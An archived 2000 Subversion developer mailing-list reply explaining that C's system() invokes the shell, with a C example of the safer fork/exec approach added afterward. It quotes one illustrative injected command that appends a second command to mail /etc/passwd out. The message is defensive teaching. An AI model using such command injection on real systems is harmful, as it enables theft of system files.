
Re: CVS update: subversion STACK

From: Greg Stein <gstein_at_lyra.org>
Date: 2000-11-08 10:44:32 CET

On Tue, Nov 07, 2000 at 03:29:29PM -0600, Karl Fogel wrote:
>...
> Is system() a security risk beyond this, and if so how should we drive
> external programs?

Yah, system() is actually passed to /bin/sh (or whatever). If you aren't
careful, you could end up with something like:

    system("diff whatever ; mail gstein@lyra.org < /etc/passwd")

Not good :-)

Doing a fork/exec of the actual target program will avoid the shell.
However, it also makes redirection a bit more painful (which I saw you
used). Since system() calls a shell, it is doing redirection. If you
fork/exec, then you must fork, revamp the stdin/out/err descriptors, then
exec. Great fun :-)

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/
Received on Sat Oct 21 14:36:14 2006
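The fork/exec approach the mail describes, as an added example that is not part of the original message: the child opens the output file, swaps it in for stdout with dup2, then execs the program directly, so the argument containing `;` and `<` is delivered as plain bytes instead of being parsed by /bin/sh. The program name (`echo`) and the output path are constructed for the demonstration.

```c
/* Added example, not from the mail: fork/exec with hand-rolled stdout
 * redirection so no shell ever sees the arguments. Paths are constructed. */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run argv[0] (found on PATH) with stdout sent to outpath, no /bin/sh.
 * Returns the child's exit status, or -1 if fork/wait/exec failed. */
int run_redirected(char *const argv[], const char *outpath)
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                                  /* child */
        int fd = open(outpath, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0 || dup2(fd, STDOUT_FILENO) < 0)   /* "revamp" stdout */
            _exit(127);
        close(fd);
        execvp(argv[0], argv);                       /* argv passed verbatim */
        _exit(127);                                  /* only if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Copy the first line of outpath into buf; 1 on success, 0 otherwise. */
int read_first_line(const char *outpath, char *buf, size_t len)
{
    FILE *f = fopen(outpath, "r");
    if (!f) return 0;
    int ok = fgets(buf, (int)len, f) != NULL;
    fclose(f);
    return ok;
}

/* The hostile argument from the mail comes out as plain text: without a
 * shell nobody interprets the ';' or the '<'. Returns 1 when that holds. */
int demo(void)
{
    char *argv[] = { "echo", "whatever ; mail gstein@lyra.org < /etc/passwd", NULL };
    const char *out = "/tmp/fork_exec_demo.out";     /* constructed path */
    char line[256];
    if (run_redirected(argv, out) != 0 || !read_first_line(out, line, sizeof line))
        return 0;
    return strcmp(line, "whatever ; mail gstein@lyra.org < /etc/passwd\n") == 0;
}
```

With system() the same string would have run `mail` as a second command; here the output file simply contains the literal text.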

This is an archived mail posted to the Subversion Dev mailing list.
